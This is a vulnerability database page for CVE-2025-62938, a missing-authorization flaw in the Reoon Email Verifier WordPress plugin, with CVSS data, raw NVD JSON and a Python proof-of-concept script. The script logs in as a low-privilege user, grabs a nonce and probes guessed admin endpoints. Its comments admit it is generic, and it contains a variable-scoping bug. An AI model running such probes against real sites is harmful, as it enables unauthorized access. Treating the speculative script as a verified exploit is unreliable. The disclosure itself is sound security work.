Security Vulnerability Report
中文
CVE-2025-62938 CVSS 4.3 MEDIUM

CVE-2025-62938

Published: 2025-10-27 02:15:54
Last Modified: 2026-04-27 17:16:36

Description

Missing Authorization vulnerability in Reoon Technology Reoon Email Verifier reoon-email-verifier allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reoon Email Verifier: from n/a through <= 2.0.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Reoon Email Verifier <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62938 PoC - Reoon Email Verifier Broken Access Control # This PoC demonstrates the missing authorization vulnerability import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password123" def get_wordpress_nonce(url): """Get WordPress nonce for authenticated requests""" session = requests.Session() # Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(f"{url}/wp-login.php", data=login_data) # Get admin page to extract nonce admin_response = session.get(f"{url}/wp-admin/admin.php?page=reoon-email-verifier") # Extract nonce from page content (simplified example) nonce = None if 'nonce' in admin_response.text: import re match = re.search(r'nonce":"([a-zA-Z0-9]+)"', admin_response.text) if match: nonce = match.group(1) return session, nonce def exploit_access_control(session, url, nonce): """Exploit the missing authorization vulnerability""" # Try to access admin-only function without proper authorization # This is a generic example - actual endpoints need to be identified endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/reoon-email-verifier/v1/verify" ] for endpoint in endpoints: print(f"[*] Testing endpoint: {endpoint}") # Example AJAX request that should require admin privileges data = { 'action': 'reoon_verify_email', 'email': '[email protected]', } if nonce: data['_wpnonce'] = nonce response = session.post(f"{url}{endpoint}", data=data) if response.status_code == 200: print(f"[!] Possible unauthorized access to {endpoint}") print(f"Response: {response.text[:200]}") return False def main(): if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Starting CVE-2025-62938 exploitation") print(f"[*] Target: {TARGET_URL}") try: session, nonce = get_wordpress_nonce(TARGET_URL) if session: exploit_access_control(session, TARGET_URL, nonce) except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62938", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:53.770", "lastModified": "2026-04-27T17:16:36.073", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Reoon Technology Reoon Email Verifier reoon-email-verifier allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reoon Email Verifier: from n/a through <= 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/reoon-email-verifier/vulnerability/wordpress-reoon-email-verifier-plugin-2-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}